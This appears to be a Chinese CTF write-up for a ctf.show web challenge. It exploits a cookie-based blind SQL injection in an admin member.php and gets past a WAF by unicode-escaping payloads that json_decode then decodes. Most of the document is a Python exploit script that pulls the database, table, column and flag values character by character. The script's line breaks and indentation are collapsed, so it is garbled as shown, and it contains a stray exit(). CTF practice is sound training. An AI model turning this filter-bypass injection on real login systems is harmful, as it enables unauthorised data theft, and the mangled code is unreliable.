0x00 前言
- CTF 加解密合集
- CTF Web合集
- 网络安全知识库
- 溯源相关
文中工具皆可关注 皓月当空w 公众号 发送关键字 工具 获取
0x01 题目
0x02 Write Up
首先拿到题目,先扫描一下,发现一个www.zip
发现一个admin目录,访问一下:
在member.php中发现一段代码,这段代码中存在sql注入,也就是在cookie中的sql注入
有一个要点是,在代码中存在waf
这里有一个小知识就是json_decode可以识别unicode代码。那么我们可以将我们的测试poc改为unicode
true的话会返回一组
false会返回两组
以此为依据,可以进行遍历
脚本用的是大佬写好的脚本
#encoding=utf-8
import requestsurl = "http://f17498a1-535d-45db-8840-09657e3b6c78.challenge.ctf.show/admin/"def tamper(payload):payload = payload.lower()payload = payload.replace('u', '\\u0075')payload = payload.replace('\'', '\\u0027')payload = payload.replace('o', '\\u006f')payload = payload.replace('i', '\\u0069')payload = payload.replace('"', '\\u0022')payload = payload.replace(' ', '\\u0020')payload = payload.replace('s', '\\u0073')payload = payload.replace('#', '\\u0023')payload = payload.replace('>', '\\u003e')payload = payload.replace('<', '\\u003c')payload = payload.replace('-', '\\u002d')payload = payload.replace('=', '\\u003d')payload = payload.replace('f1a9', 'F1a9')payload = payload.replace('f1', 'F1')return payload#get database length
def databaseName_len():print ("start get database name length...")for l in range(0,45):payload = "1' or (length(database())=" + str(l+1) + ")#"print(payload)payload = tamper(payload)print(payload)tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payloadprint(tmpCookie)exit()headers = {'cookie': tmpCookie}r =requests.get(url, headers=headers)myHeaders = str(r.raw.headers)if ((myHeaders.count("login_data") == 1)):print('get db length = ' + str(l).lower())break#get content
def get_databaseName():flag = ''for j in range(0, 15):for c in range(0x20,0x7f):if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':continueelse:payload = "1' or (select (database()) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"#print(payload)payload = tamper(payload)tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payloadheaders = {'cookie': tmpCookie}r =requests.get(url, headers=headers)myHeaders = str(r.raw.headers)if ((myHeaders.count("login_data") == 2)):flag += chr(c - 1)print('databasename = ' + flag.lower())break#get content
def get_tableName():flag = ''for j in range(0, 30): #blind injectfor c in range(0x20,0x7f):if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':continueelse:payload = "1' or (select (select table_name from information_schema.tables where table_schema=database() limit 3,1) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"#print(payload)payload = tamper(payload)tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payloadheaders = {'cookie': tmpCookie}r =requests.get(url, headers=headers)myHeaders = str(r.raw.headers)if ((myHeaders.count("login_data") == 2)):flag += chr(c - 1)print('tablename = ' + flag.lower())break#get content
def get_ColumnName():flag = ''for j in range(0, 10): #blind injectfor c in range(0x20,0x7f):if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':continueelse:payload = "1' or (select (select column_name from information_schema.columns where table_name='FL2333G' limit 0,1) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"#print(payload)payload = tamper(payload)tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payloadheaders = {'cookie': tmpCookie}r =requests.get(url, headers=headers)myHeaders = str(r.raw.headers)if ((myHeaders.count("login_data") == 2)):flag += chr(c - 1)print('column name = ' + flag.lower())break#get content
def get_value():flag = ''for j in range(0, 50): #blind injectfor c in range(0x20,0x7f):if chr(c) == '\'' or chr(c) == ';' or chr(c) == '\\' or chr(c) == '+':continueelse:payload = "1' or (select (select FLLLLLAG from FL2333G) between '" + flag + chr(c) + "' and '" +chr(126) + "')#"#print(payload)payload = tamper(payload)tmpCookie = 'islogin=1;login_data={"admin_user":"%s","admin_pass":65}' % payloadheaders = {'cookie': tmpCookie}r =requests.get(url, headers=headers)myHeaders = str(r.raw.headers)if ((myHeaders.count("login_data") == 2)):flag += chr(c - 1)print('flag = ' + flag.lower())breakprint ("start database sql injection...")
# databaseName_len()
# get_databaseName()
# get_tableName()
# get_ColumnName()
get_value()
0x03 other
欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。
以上
